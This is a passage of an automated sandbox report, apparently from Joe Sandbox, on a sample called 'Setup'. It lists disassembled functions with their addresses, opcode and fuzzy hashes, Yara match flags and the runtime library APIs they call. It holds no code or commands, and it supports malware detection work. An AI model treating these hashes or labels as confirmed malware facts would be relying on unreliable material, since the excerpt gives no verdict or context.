Opcode Fuzzy Hash: 66d3c4330584cf66625d66b979b8690f9f99df4546b104dd0ab651a53dc27980
Instruction Fuzzy Hash: 92D1A175209B818FD325CF6CC88065AFFE1BF9A201F488A5DE9D587752C730E518CB62

Function 02D5A5C4 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d50000_Setup.jbxd

Yara matches

Similarity

API ID: Concurrency::cancel_current_task
String ID:
API String ID: 118556049-0
Opcode ID: 140c520770d71d4704fb0011f8ed663222b58d15450df6b373c21c3f6d516308
Instruction ID: deefc48cec0b7319343aed79319c4a16aba83fb3a68cdcdf94b10bb3d22e056b
Opcode Fuzzy Hash: 140c520770d71d4704fb0011f8ed663222b58d15450df6b373c21c3f6d516308
Instruction Fuzzy Hash: C1D14170D152889BDB05EF78C9097EC7BB1AF16308F6482CDE4446B281DB755B84DBE2

Function 02D76594 Relevance: .3, Instructions: 270COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d50000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07e95fe36e2e581d8fbbe0608f7741149d1007bc33f3a696e7a8daa87208ca57
Instruction ID: 7b1c24035bc4ad3854e27af5f00c40075acac263f78ecd5e8f7d6767eec865e6
Opcode Fuzzy Hash: 07e95fe36e2e581d8fbbe0608f7741149d1007bc33f3a696e7a8daa87208ca57
Instruction Fuzzy Hash: E3C14671A0568ADFCB05CFA8C5807ACFBF5BF49310F24826AE445E7741E739AA54CB90

Function 031C4DB0 Relevance: .3, Instructions: 270COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ffd85303f2b6cc1a2108e30a5e50be8ba911a566221e984fe34ab863a9d462e
Instruction ID: b620d0684a68fc0ee27acc581a3e36c745a8149da74b9b62b148eebe48915c05
Opcode Fuzzy Hash: 5ffd85303f2b6cc1a2108e30a5e50be8ba911a566221e984fe34ab863a9d462e
Instruction Fuzzy Hash: 3CC15534A1528ADFCB05CFA9C4906ECFBB5AF99310F258169E445E7341EB35A990CB90

Function 02DB91A4 Relevance: .3, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d50000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6511f00562f783c4fe1ba655e0fdf067de8ed43be33f6b0a13940d8e492885d5
Instruction ID: 705b7b9a89dcacb736448b0b077ae19e2743be79355ac3fbf7b0700189594753
Opcode Fuzzy Hash: 6511f00562f783c4fe1ba655e0fdf067de8ed43be33f6b0a13940d8e492885d5
Instruction Fuzzy Hash: E8B11631510648DFD716CF28C4AABA57BA0FF45368F258658E9DACB3A1C335E981CF44

Function 031CA120 Relevance: .3, Instructions: 257COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: ByteCharConcurrency::cancel_current_taskMultiWide
String ID:
API String ID: 1164694947-0
Opcode ID: 8887ceec1b13f487d9c6c2c77e5c7b4f7b8e3fe01616e0a2a8aa9dce742ba040
Instruction ID: 1fb8f81f75686381f0c505352616eaca5ab6a2cf7b27722dde7639c979d8ea39
Opcode Fuzzy Hash: 8887ceec1b13f487d9c6c2c77e5c7b4f7b8e3fe01616e0a2a8aa9dce742ba040
Instruction Fuzzy Hash: 92B15A70D14358EBDB15EF64C9497DDBBB0AF59708F2082C9E4056B282DBB65AC4CBC1

Function 02D89388 Relevance: .2, Instructions: 242COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d50000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 36a7ea18dfccb83414c67659095619f6519e6dc2df86d95540249796b147510b
Instruction ID: b4e53872ea2556d99c10652e473c8d114b17f5037d3769221359d4c7c0b76be7
Opcode Fuzzy Hash: 36a7ea18dfccb83414c67659095619f6519e6dc2df86d95540249796b147510b
Instruction Fuzzy Hash: 89A16DB1D10A458FDB19CF68D8A2AADBBF1FB58324F24813AD549EB350D3359940CF94

Function 02D71314 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d50000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: caff254c2b64b8bcbcdcbfc4b5d789f54f801f38b51a0bc293fa48459d213cef
Instruction ID: 33a06e26a440dcfc223f5fb5ecc8a23dd099ddbf487bc8fedffe45db2c93090c
Opcode Fuzzy Hash: caff254c2b64b8bcbcdcbfc4b5d789f54f801f38b51a0bc293fa48459d213cef
Instruction Fuzzy Hash: BE712C75E0011A9BCB14CFA9C8406AEF7B6FF84304F558269D95AE7744E734EE11CB90

Function 031BFB30 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 112f730698fdd933a1e20dc6c7fd446fb68c2eec725e9ecf6a49c537bbb9d656
Instruction ID: 1850db61ca4ac16c5441cb9db606bafe3b64349d26cc161950cba2d6c895976a
Opcode Fuzzy Hash: 112f730698fdd933a1e20dc6c7fd446fb68c2eec725e9ecf6a49c537bbb9d656
Instruction Fuzzy Hash: 03714FB5E0011A9FCB18CF69C850AEEF7B5FF88310F598669D915E7344E730AA56CB80

Function 02D79FA4 Relevance: .2, Instructions: 206COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d50000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 893c7d9045ba199658c724d9c3563c1e06ac364c42555fc515a1bc0e281d522b
Instruction ID: 5ea534655c0d162185ca03c76bf384600bdbe677b7c433f5da7e7e6172dca729
Opcode Fuzzy Hash: 893c7d9045ba199658c724d9c3563c1e06ac364c42555fc515a1bc0e281d522b
Instruction Fuzzy Hash: 7D51EDB3E011256BDB18EAA98C459BFF7ABDBC8310F15816DE909E7340DA359D018BE0

Function 031C87C0 Relevance: .2, Instructions: 206COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 893c7d9045ba199658c724d9c3563c1e06ac364c42555fc515a1bc0e281d522b
Instruction ID: 56a58d075764142ed5a6f7106f4c438f12fcc480965032bb843efafc6b75ac9d
Opcode Fuzzy Hash: 893c7d9045ba199658c724d9c3563c1e06ac364c42555fc515a1bc0e281d522b
Instruction Fuzzy Hash: AB5119B3E011256BDB18DAE9CC819BFF7ABDBC8210F05816DED09E7240D675AD1086D0

Function 02D74E74 Relevance: .2, Instructions: 194COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d50000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3fe37af3e313c02da52baeb62f5118d446ce2b792a4226e19bfca930f8075909
Instruction ID: 005003daccc5060e62e51805ca20c82f9a2144d47974d31fb00df069b3debbcf
Opcode Fuzzy Hash: 3fe37af3e313c02da52baeb62f5118d446ce2b792a4226e19bfca930f8075909
Instruction Fuzzy Hash: E26138B2E1051A8FCB05CF68C880AAEF7B5FB48310F55826AE915E7784E734AD11CBD4

Function 031C3690 Relevance: .2, Instructions: 194COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a497e67086c0fec5f86d0ceadc73a02b7a5d71e9d9d06661b7342522af083e06
Instruction ID: 48866598f16ad8b7325914f753614f4595b0cffc14acd050cd7ed6fca691232e
Opcode Fuzzy Hash: a497e67086c0fec5f86d0ceadc73a02b7a5d71e9d9d06661b7342522af083e06
Instruction Fuzzy Hash: B5616BB6E1025A8FCB08CF9CC8406AEF7F5FB58310F158669D825E7640E734A911CBD4

Function 02DA7C67 Relevance: .2, Instructions: 156COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d50000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 452f7488cc4eed07f6e177e429ecc21ff5953957f89fe2dcdbfa193ed2300b74
Instruction ID: 757537502a9ef5645081ef3cecb311ec9e2b3069df8001adcb3f56959725c4ce
Opcode Fuzzy Hash: 452f7488cc4eed07f6e177e429ecc21ff5953957f89fe2dcdbfa193ed2300b74
Instruction Fuzzy Hash: 57514A72D00119EFEF15CF98C850AEEBBB6EF88304F198499E915AB341D7349A51CB90

Function 031F6483 Relevance: .2, Instructions: 156COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0aec070ff7df71079dea68aa5c4471150d6744103dc1b2f8df810bae891c6966
Instruction ID: 5c3ed19207512fef43ca786c0492ff60c205ab0db3d68ffa9e02ac5039828ae7
Opcode Fuzzy Hash: 0aec070ff7df71079dea68aa5c4471150d6744103dc1b2f8df810bae891c6966
Instruction Fuzzy Hash: 90519272D00219EFDF04CF98C950AEEBBB6FF88304F098499E915AB241D7749A51CB90

Function 02D56304 Relevance: .1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d50000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c71cff6a94870fedccfcd55475c18c7052ef66247d7d813a07c0d6ad7669ce3
Instruction ID: 1160bbb5c84cb139a860d6616e949c05c1a91a88a5c888087a70307a49f5b537
Opcode Fuzzy Hash: 4c71cff6a94870fedccfcd55475c18c7052ef66247d7d813a07c0d6ad7669ce3
Instruction Fuzzy Hash: AD41BB2111ABC48FD739CE6C880119A7FE1DF66214B484B9DE4E797B83C254E609C7F6

Function 031A4B20 Relevance: .1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c71cff6a94870fedccfcd55475c18c7052ef66247d7d813a07c0d6ad7669ce3
Instruction ID: 14805ce10d9f4bfcf4a7330f6a6edee17a80f8f6e9376895173481a2dba42daf
Opcode Fuzzy Hash: 4c71cff6a94870fedccfcd55475c18c7052ef66247d7d813a07c0d6ad7669ce3
Instruction Fuzzy Hash: 2E419525219BC48FC339CE6C881119ABFE0DF66211B484B8DE4D787BC3C654E609C7AA

Function 02D50F77 Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d50000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b09967ac5482500bc099009dc95111bd7cc7545dcabcf40ba633cd1a509d9f95
Instruction ID: 0faed274cd9d46d2db230e7b5ca3429c4d356d0685c950256484f227247bb69f
Opcode Fuzzy Hash: b09967ac5482500bc099009dc95111bd7cc7545dcabcf40ba633cd1a509d9f95
Instruction Fuzzy Hash: DC514B74A00219DFCF08CF98C590AAEB7B2FF88314F248199D815AB355D771EE91DBA4

Function 02DA1B24 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d50000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: 7fd7e572fa2ee716f84c8b95c62016c2edec848248f983aa27ffdde01c7db3ce
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: FE11E2B720704147D6148A2DD9F4EB7A796EBD7239F2C43AAD04E8B768F322E945D600

Function 031F0340 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: da0ea793fc876ca4434dbd13d4579f594cb1e6a1e337eaa8dad02b8e922da3e6
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: C3113A772051828FD714CA3EC8B86BBE396FBCD221B2D43BAD3424B75AD362E1459600

Function 02D50F76 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d50000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e64317625e06953a0030493f718403388be9115d8c6a0e5777c3d8d6dbedd3d
Instruction ID: 2ce45e7b1cce4a487ea4860cc1d068ac82fa82697eb3d342b215159f33eecbf2
Opcode Fuzzy Hash: 4e64317625e06953a0030493f718403388be9115d8c6a0e5777c3d8d6dbedd3d
Instruction Fuzzy Hash: 2A314C74E00219DFCB08CF99C590AAEBBB1FF48314F248599D815AB345D775AA82CB94

Function 02D52E84 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d50000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b7d82a58c69eb59796d6feee6bafd5b637586ba87d30fb21762b28b218e291a
Instruction ID: 9b959db476dc140c83dd1da8153a645de9091157471ee3055ab103fe5aca7240
Opcode Fuzzy Hash: 5b7d82a58c69eb59796d6feee6bafd5b637586ba87d30fb21762b28b218e291a
Instruction Fuzzy Hash: 2B0184319140710A878C8A7AAC5943BBF949B4321234B07BFED87EF1C7C92DE528D7A4

Function 031A16A0 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9bbcbb49ec9428982a2686bab3bf675aa3121413c31aba54b3cdbbaeb2ba67c
Instruction ID: 31e564b782e1b84d9fbe4e5d2ccffdf776509c883b03d356dbafe948d1bd5e34
Opcode Fuzzy Hash: d9bbcbb49ec9428982a2686bab3bf675aa3121413c31aba54b3cdbbaeb2ba67c
Instruction Fuzzy Hash: 3E01F5329140711A831C8A7DAC65436BF959B4751334B53BBD8C7EB186C529E014D7A0

Function 02D50CD7 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d50000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f432f6d4d57ddd5edf10f0a55197208a6667e030cc273150dee4b63bd6a15e3
Instruction ID: 35b5617f4983025d26fa1a7d14db38448be49335e7c944bf523279e93c5eafec
Opcode Fuzzy Hash: 2f432f6d4d57ddd5edf10f0a55197208a6667e030cc273150dee4b63bd6a15e3
Instruction Fuzzy Hash: 6C01A434A01118EFCB14DF98C294AADB7B6FB49315F20859AD805AB781D772AE41DB50

Function 031E3509 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 031E3510
_Maklocstr.LIBCPMT ref: 031E3579
_Maklocstr.LIBCPMT ref: 031E358B
_Maklocchr.LIBCPMT ref: 031E35A3
_Maklocchr.LIBCPMT ref: 031E35B3
_Getvals.LIBCPMT ref: 031E35D5

Part of subcall function 031DCBA3: _Maklocchr.LIBCPMT ref: 031DCBD2
Part of subcall function 031DCBA3: _Maklocchr.LIBCPMT ref: 031DCBE8

Strings

false, xrefs: 031E3574
true, xrefs: 031E3586

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: Maklocchr$Maklocstr$GetvalsH_prolog3_
String ID: false$true
API String ID: 3549167292-2658103896
Opcode ID: c499edc72f543d857c6ca254e21852ab71ae00976b1f4bdba0d6958f586ef931
Instruction ID: 2f9b8de12cbba2c1f90991cbb1440f5cd955a295d64a5628848bc1bdcf6cdefd
Opcode Fuzzy Hash: c499edc72f543d857c6ca254e21852ab71ae00976b1f4bdba0d6958f586ef931
Instruction Fuzzy Hash: 97215C75D10318ABDF19EFA8DC44A9F7BB8AF09710F00841AE9299F251DB709550CBE1

Function 02DA35FC Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 02DA371B
___TypeMatch.LIBVCRUNTIME ref: 02DA3829
CatchIt.LIBVCRUNTIME ref: 02DA387A
CallUnexpected.LIBVCRUNTIME ref: 02DA3996

Strings

csm, xrefs: 02DA3639
csm, xrefs: 02DA36A6
csm, xrefs: 02DA3752

Memory Dump Source

Source File: 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d50000_Setup.jbxd

Yara matches

Similarity

API ID: CallCatchMatchTypeUnexpectedtype_info::operator==
String ID: csm$csm$csm
API String ID: 2356445960-393685449
Opcode ID: b983ac2c03ccaef37f80f1a1cd16779651771ce1dadcdc2a89682428c6ae60b2
Instruction ID: 852f469709a846fde40e5b94a65db8aade28229a4bb77e8e434b77b26e367e33
Opcode Fuzzy Hash: b983ac2c03ccaef37f80f1a1cd16779651771ce1dadcdc2a89682428c6ae60b2
Instruction Fuzzy Hash: C0B12371800249ABCF99DFA4C8A0EAEBBB6FF04314F14859AE8156B311D735DE51CFA1

Function 031F1E18 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 031F1F37
___TypeMatch.LIBVCRUNTIME ref: 031F2045
CatchIt.LIBVCRUNTIME ref: 031F2096
CallUnexpected.LIBVCRUNTIME ref: 031F21B2

Strings

csm, xrefs: 031F1E55
csm, xrefs: 031F1F6E
csm, xrefs: 031F1EC2

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: CallCatchMatchTypeUnexpectedtype_info::operator==
String ID: csm$csm$csm
API String ID: 2356445960-393685449
Opcode ID: 6b1fd7559d453273744c7a5dee56b12cde5b296e11db71a325fa13ca80f91e90
Instruction ID: d4c7b7eaa810b3cd6bfb6c980463d9e51c0b7f0ab554d137a5b713f54bae8faa
Opcode Fuzzy Hash: 6b1fd7559d453273744c7a5dee56b12cde5b296e11db71a325fa13ca80f91e90
Instruction Fuzzy Hash: 04B18E79800209EFCF15EFA4C8809AEB7B5FF0C310F1849AAEA156B215D731DA52CF95

Function 02D88464 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 151COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 02D884A3
std::_Lockit::_Lockit.LIBCPMT ref: 02D884C5
std::_Lockit::~_Lockit.LIBCPMT ref: 02D884ED
__Getctype.LIBCPMT ref: 02D885C8
std::_Facet_Register.LIBCPMT ref: 02D8862E
std::_Lockit::~_Lockit.LIBCPMT ref: 02D88662

Strings

@PI, xrefs: 02D88676

Memory Dump Source

Source File: 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d50000_Setup.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
String ID: @PI
API String ID: 1102183713-979431602
Opcode ID: 321eb683f322f522ce3c474507a28299b7adb0f38b7ab8a8a61176575a36d688
Instruction ID: 0fc7a17168e893b7b50be799112a1f910b4aa86879cf842424f5fe8a6e474904
Opcode Fuzzy Hash: 321eb683f322f522ce3c474507a28299b7adb0f38b7ab8a8a61176575a36d688
Instruction Fuzzy Hash: B0617A71C00249DBDB01EF98C5407AEBBF1FF54314F2481AAC419AB391EB75AE45CB95

Function 031E35E2 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 73COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 031E35E9
_Maklocstr.LIBCPMT ref: 031E3650
_Maklocstr.LIBCPMT ref: 031E3662
_Maklocchr.LIBCPMT ref: 031E367A
_Maklocchr.LIBCPMT ref: 031E368A

Strings

false, xrefs: 031E364B
true, xrefs: 031E365D

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: MaklocchrMaklocstr$H_prolog3_
String ID: false$true
API String ID: 2404127365-2658103896
Opcode ID: 91a1a6f8340d479d557c00839f21e2cf2204726f1350be6460687de402c8bf88
Instruction ID: 8dbd40a892fb51587bf340b8b0cbf65cfde7d3ecd48cb5cd94862fc10d3fb501
Opcode Fuzzy Hash: 91a1a6f8340d479d557c00839f21e2cf2204726f1350be6460687de402c8bf88
Instruction Fuzzy Hash: 0E215E79C10344AFDF14EFA5D84499FBBB8EF5A700F04845AE9159F251EB70D550CBA0

Function 02DB7FC9 Relevance: 10.8, APIs: 7, Instructions: 329COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 02DB804F

Memory Dump Source

Source File: 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d50000_Setup.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: eacdd1a48d98970d3187731e2bb8be3bc7fde5c65dfc6de09c7b5f1c7425a61f
Instruction ID: 91ec2e527a962cb0d31a80152a6af40a767c35b8783eb12ca3aa031908430f0b
Opcode Fuzzy Hash: eacdd1a48d98970d3187731e2bb8be3bc7fde5c65dfc6de09c7b5f1c7425a61f
Instruction Fuzzy Hash: 95B13572E01796DFDB128A28CCA0BEEBBA9EF45350F148155E946EB381D770DD01DBA0

Function 032067E5 Relevance: 10.8, APIs: 7, Instructions: 329COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 0320686B

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: eacdd1a48d98970d3187731e2bb8be3bc7fde5c65dfc6de09c7b5f1c7425a61f
Instruction ID: da7fbba4f16be3bd9c8eedb49f7469ebbe4f260da0ac93f6bc0a023e535206d1
Opcode Fuzzy Hash: eacdd1a48d98970d3187731e2bb8be3bc7fde5c65dfc6de09c7b5f1c7425a61f
Instruction Fuzzy Hash: 2FB16B72A203569FDB11CF58CC80BAEBBA5EF55310F184165E944AF2C3D374D9A9C7A0

Function 02D6C054 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 133COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 02D6C091
std::_Lockit::_Lockit.LIBCPMT ref: 02D6C0B3
std::_Lockit::~_Lockit.LIBCPMT ref: 02D6C0DB
std::_Facet_Register.LIBCPMT ref: 02D6C1D5
std::_Lockit::~_Lockit.LIBCPMT ref: 02D6C209

Strings

@PI, xrefs: 02D6C21E

Memory Dump Source

Source File: 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d50000_Setup.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
String ID: @PI
API String ID: 459529453-979431602
Opcode ID: 8b79870ac0ac31644188265c86ad301e8afc5e1f22b816f314848cad0c8ff8e9
Instruction ID: ad2909a15f4b5b2af30a274f78de709faad42deb20e309fd96b94e5975388665
Opcode Fuzzy Hash: 8b79870ac0ac31644188265c86ad301e8afc5e1f22b816f314848cad0c8ff8e9
Instruction Fuzzy Hash: A4516B70900249DFDB01DF98C9587AEBBF4EF54314F24806AD455AB380EBB9AE05CFA5

Function 03205F60 Relevance: 9.3, APIs: 6, Instructions: 292COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93a475145e9731b99c5cd821099f5ae6f753606ea25927392ba719824f457b37
Instruction ID: ffba22c335a0df299596628670090d8d1d880c8a12f9b6c8bb74f674a9ee602d
Opcode Fuzzy Hash: 93a475145e9731b99c5cd821099f5ae6f753606ea25927392ba719824f457b37
Instruction Fuzzy Hash: C7B11774A243469FDB01DF98D844BBEBBB6FF4A310F084159E5019B2C3CBB49999CB60

Function 031DB65D Relevance: 9.2, APIs: 6, Instructions: 175COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 031DB6A6
MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 031DB711
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 031DB72E
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 031DB76D
